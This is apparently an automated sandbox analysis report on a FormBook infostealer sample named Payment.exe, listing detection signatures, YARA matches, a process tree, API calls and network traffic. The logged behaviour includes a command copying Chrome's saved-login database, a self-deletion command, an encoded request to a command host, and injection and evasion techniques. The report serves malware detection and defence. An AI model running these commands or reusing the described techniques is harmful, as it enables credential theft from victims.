Loading ...

Play interactive tourEdit tour

Analysis Report Payment.exe

Overview

General Information

Sample Name:Payment.exe
MD5:270d6569643f6933dc525835f72d80a8
SHA1:28efd00cbe954d49dc547492d9dabe0f476102e7
SHA256:6cedea888c451f6f61096686be8ba2aeae326f176885d14f4c6c8b6bc56c08a8

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected FormBook malware
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Steal Google chrome login data
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
PE file has nameless sections
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Uses netsh to modify the Windows network and firewall settings
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Payment.exe (PID: 4968 cmdline: 'C:\Users\user\Desktop\Payment.exe' MD5: 270D6569643F6933DC525835F72D80A8)
    • explorer.exe (PID: 2928 cmdline: MD5: E4A81EDDFF8B844D85C8B45354E4144E)
      • netsh.exe (PID: 2280 cmdline: C:\Windows\SysWOW64\netsh.exe MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
        • cmd.exe (PID: 1536 cmdline: /c del 'C:\Users\user\Desktop\Payment.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 1520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • cmd.exe (PID: 4228 cmdline: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 5016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.1006564055.00000000009B0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000000.00000002.1006564055.00000000009B0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x157b9:$sqlite3step: 68 34 1C 7B E1
    • 0x158cc:$sqlite3step: 68 34 1C 7B E1
    • 0x157e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1590d:$sqlite3text: 68 38 2A 90 C5
    • 0x157fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x15923:$sqlite3blob: 68 53 D8 7F 8C
    00000000.00000002.1006564055.00000000009B0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x7248:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x74b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x12b35:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x12621:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x12c37:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x12daf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x802a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1189c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x89c3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x17ea7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x18eaa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000000.00000002.1006754841.0000000000D80000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000000.00000002.1006754841.0000000000D80000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x157b9:$sqlite3step: 68 34 1C 7B E1
      • 0x158cc:$sqlite3step: 68 34 1C 7B E1
      • 0x157e8:$sqlite3text: 68 38 2A 90 C5
      • 0x1590d:$sqlite3text: 68 38 2A 90 C5
      • 0x157fb:$sqlite3blob: 68 53 D8 7F 8C
      • 0x15923:$sqlite3blob: 68 53 D8 7F 8C
      Click to see the 4 entries

      Sigma Overview


      System Summary:

      barindex
      Sigma detected: Steal Google chrome login dataShow sources
      Source: Process startedAuthor: Joe Security: Data: Command: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\netsh.exe, ParentImage: C:\Windows\SysWOW64\netsh.exe, ParentProcessId: 2280, ProcessCommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, ProcessId: 4228

      Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Multi AV Scanner detection for submitted fileShow sources
      Source: Payment.exeVirustotal: Detection: 17%Perma Link
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000000.00000002.1006564055.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.1006754841.0000000000D80000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.1008584406.000000000386C000.00000040.00000001.sdmp, type: MEMORY
      Machine Learning detection for sampleShow sources
      Source: Payment.exeJoe Sandbox ML: detected

      Source: global trafficHTTP traffic detected: GET /p9g/?rz=sx1h9zONAUD0SGu6iotbukrmFxqOnGKQjWU3iDvcZZjGUVaPjo7YgUXSXfl2bX+6BwIw&s6=fHwHY HTTP/1.1Host: www.biquzhibo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: Joe Sandbox ViewASN Name: unknown unknown
      Source: global trafficHTTP traffic detected: GET /p9g/?rz=sx1h9zONAUD0SGu6iotbukrmFxqOnGKQjWU3iDvcZZjGUVaPjo7YgUXSXfl2bX+6BwIw&s6=fHwHY HTTP/1.1Host: www.biquzhibo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: unknownDNS traffic detected: queries for: www.biquzhibo.com
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 May 2020 18:09:45 GMTServer: Apache/2.4.39 (Win64) PHP/5.6.40Content-Length: 295Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 70 39 67 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 39 20 28 57 69 6e 36 34 29 20 50 48 50 2f 35 2e 36 2e 34 30 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 62 69 71 75 7a 68 69 62 6f 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /p9g/ was not found on this server.</p><hr><address>Apache/2.4.39 (Win64) PHP/5.6.40 Server at www.biquzhibo.com Port 80</address></body></html>
      Source: explorer.exe, 00000003.00000000.986463639.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
      Source: explorer.exe, 00000003.00000000.986463639.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
      Source: explorer.exe, 00000003.00000000.984584383.0000000007B92000.00000004.00000001.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
      Source: explorer.exe, 00000003.00000000.986463639.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
      Source: explorer.exe, 00000003.00000000.986463639.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
      Source: explorer.exe, 00000003.00000000.986463639.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
      Source: explorer.exe, 00000003.00000000.986463639.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
      Source: explorer.exe, 00000003.00000000.986463639.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
      Source: explorer.exe, 00000003.00000000.986463639.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
      Source: explorer.exe, 00000003.00000000.986463639.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
      Source: explorer.exe, 00000003.00000000.986463639.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
      Source: explorer.exe, 00000003.00000000.986463639.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
      Source: explorer.exe, 00000003.00000000.986463639.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
      Source: explorer.exe, 00000003.00000000.986463639.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
      Source: explorer.exe, 00000003.00000000.986463639.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
      Source: explorer.exe, 00000003.00000000.986463639.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn

      Source: Payment.exe, 00000000.00000002.1006339786.00000000005B0000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

      E-Banking Fraud:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000000.00000002.1006564055.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.1006754841.0000000000D80000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.1008584406.000000000386C000.00000040.00000001.sdmp, type: MEMORY

      System Summary:

      barindex
      Detected FormBook malwareShow sources
      Source: C:\Windows\SysWOW64\netsh.exeDropped file: C:\Users\user\AppData\Roaming\0M0Q5-6-\0M0logri.iniJump to dropped file
      Source: C:\Windows\SysWOW64\netsh.exeDropped file: C:\Users\user\AppData\Roaming\0M0Q5-6-\0M0logrf.iniJump to dropped file
      Source: C:\Windows\SysWOW64\netsh.exeDropped file: C:\Users\user\AppData\Roaming\0M0Q5-6-\0M0logrv.iniJump to dropped file
      Malicious sample detected (through community Yara rule)Show sources
      Source: 00000000.00000002.1006564055.00000000009B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000000.00000002.1006564055.00000000009B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000000.00000002.1006754841.0000000000D80000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000000.00000002.1006754841.0000000000D80000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000000.00000002.1008584406.000000000386C000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000000.00000002.1008584406.000000000386C000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Initial sample is a PE file and has a suspicious nameShow sources
      Source: initial sampleStatic PE information: Filename: Payment.exe
      PE file has nameless sectionsShow sources
      Source: Payment.exeStatic PE information: section name:
      Source: C:\Users\user\Desktop\Payment.exeProcess Stats: CPU usage > 98%
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C9A3E0 NtFreeVirtualMemory,LdrInitializeThunk,0_2_03C9A3E0
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C9A360 NtAllocateVirtualMemory,LdrInitializeThunk,0_2_03C9A360
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C9A2D0 NtClose,LdrInitializeThunk,0_2_03C9A2D0
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C9A240 NtReadFile,LdrInitializeThunk,0_2_03C9A240
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C9A750 NtCreateFile,LdrInitializeThunk,0_2_03C9A750
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C9A700 NtProtectVirtualMemory,LdrInitializeThunk,0_2_03C9A700
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C9A720 NtResumeThread,LdrInitializeThunk,0_2_03C9A720
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C9A6A0 NtCreateSection,LdrInitializeThunk,0_2_03C9A6A0
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C9A610 NtAdjustPrivilegesToken,LdrInitializeThunk,0_2_03C9A610
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C9A5F0 NtReadVirtualMemory,LdrInitializeThunk,0_2_03C9A5F0
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C9A540 NtDelayExecution,LdrInitializeThunk,0_2_03C9A540
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C9A560 NtQuerySystemInformation,LdrInitializeThunk,0_2_03C9A560
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C9A480 NtMapViewOfSection,LdrInitializeThunk,0_2_03C9A480
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C9A4A0 NtUnmapViewOfSection,LdrInitializeThunk,0_2_03C9A4A0
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C9A410 NtQueryInformationToken,LdrInitializeThunk,0_2_03C9A410
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C9A3D0 NtCreateKey,0_2_03C9A3D0
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C9A350 NtQueryValueKey,0_2_03C9A350
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C9A370 NtQueryInformationProcess,0_2_03C9A370
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C9A310 NtEnumerateValueKey,0_2_03C9A310
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C9A2F0 NtQueryInformationFile,0_2_03C9A2F0
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C9A260 NtWriteFile,0_2_03C9A260
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C9A220 NtWaitForSingleObject,0_2_03C9A220
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C9BA30 NtSetContextThread,0_2_03C9BA30
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C9B0B0 NtGetContextThread,0_2_03C9B0B0
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C9A800 NtSetValueKey,0_2_03C9A800
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C9A780 NtOpenDirectoryObject,0_2_03C9A780
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C9A710 NtQuerySection,0_2_03C9A710
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C9A6D0 NtCreateProcessEx,0_2_03C9A6D0
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C9A650 NtQueueApcThread,0_2_03C9A650
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C9A5A0 NtWriteVirtualMemory,0_2_03C9A5A0
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C9BD40 NtSuspendThread,0_2_03C9BD40
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C9A520 NtEnumerateKey,0_2_03C9A520
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C9ACE0 NtCreateMutant,0_2_03C9ACE0
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C9A460 NtOpenProcess,0_2_03C9A460
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C9A470 NtSetInformationFile,0_2_03C9A470
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C9B470 NtOpenThread,0_2_03C9B470
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C9B410 NtOpenProcessToken,0_2_03C9B410
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C9A430 NtQueryVirtualMemory,0_2_03C9A430
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_003F86E00_2_003F86E0
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C863C20_2_03C863C2
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C5EBE00_2_03C5EBE0
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C84B960_2_03C84B96
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C7FB400_2_03C7FB40
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D222DD0_2_03D222DD
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D21A990_2_03D21A99
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C742B00_2_03C742B0
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C84A5B0_2_03C84A5B
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D2E2140_2_03D2E214
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D10A020_2_03D10A02
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C8523D0_2_03C8523D
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D161DF0_2_03D161DF
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D219E20_2_03D219E2
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C861800_2_03C86180
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D2D9BE0_2_03D2D9BE
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C8594B0_2_03C8594B
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03CA99060_2_03CA9906
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C871100_2_03C87110
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C848CB0_2_03C848CB
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D228E80_2_03D228E8
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C6A0800_2_03C6A080
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D018B60_2_03D018B6
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C810700_2_03C81070
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D1D0160_2_03D1D016
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C898100_2_03C89810
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C8E0200_2_03C8E020
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C800210_2_03C80021
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D21FCE0_2_03D21FCE
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D127820_2_03D12782
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C757900_2_03C75790
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D217460_2_03D21746
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D226F80_2_03D226F8
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D13E960_2_03D13E96
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C776400_2_03C77640
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C84E610_2_03C84E61
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D1CE660_2_03D1CE66
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C85E700_2_03C85E70
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C866110_2_03C86611
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D1D5D20_2_03D1D5D2
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D0FDDB0_2_03D0FDDB
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D01DE30_2_03D01DE3
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03CFE58A0_2_03CFE58A
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D1E5810_2_03D1E581
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C50D400_2_03C50D40
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D11D1B0_2_03D11D1B
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D225190_2_03D22519
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03CFC53F0_2_03CFC53F
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C715300_2_03C71530
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D1DCC50_2_03D1DCC5
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D144EF0_2_03D144EF
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D134900_2_03D13490
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D22C9A0_2_03D22C9A
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D21C9F0_2_03D21C9F
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C8547E0_2_03C8547E
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C6740C0_2_03C6740C
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C714100_2_03C71410
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D0F42B0_2_03D0F42B
      Source: C:\Users\user\Desktop\Payment.exeCode function: String function: 03CADDE8 appears 37 times
      Source: C:\Users\user\Desktop\Payment.exeCode function: String function: 03C5B0E0 appears 174 times
      Source: Payment.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: Payment.exe, 00000000.00000003.1004803327.000000000060E000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamenetsh.exej% vs Payment.exe
      Source: Payment.exe, 00000000.00000002.1009402390.0000000003D4F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Payment.exe
      Source: 00000000.00000002.1006564055.00000000009B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000000.00000002.1006564055.00000000009B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000000.00000002.1006754841.0000000000D80000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000000.00000002.1006754841.0000000000D80000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000000.00000002.1008584406.000000000386C000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000000.00000002.1008584406.000000000386C000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@8/6@2/1
      Source: C:\Windows\SysWOW64\netsh.exeFile created: C:\Users\user\AppData\Roaming\0M0Q5-6-Jump to behavior
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1520:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5016:120:WilError_01
      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\DB1Jump to behavior
      Source: C:\Users\user\Desktop\Payment.exeCommand line argument: Checker10_2_003F1250
      Source: C:\Users\user\Desktop\Payment.exeCommand line argument: Checker10_2_003F1250
      Source: C:\Users\user\Desktop\Payment.exeCommand line argument: Checker10_2_003F1250
      Source: Payment.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\Payment.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: Payment.exeVirustotal: Detection: 17%
      Source: C:\Users\user\Desktop\Payment.exeFile read: C:\Users\user\Desktop\Payment.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\Payment.exe 'C:\Users\user\Desktop\Payment.exe'
      Source: unknownProcess created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe
      Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Payment.exe'
      Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
      Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Payment.exe'Jump to behavior
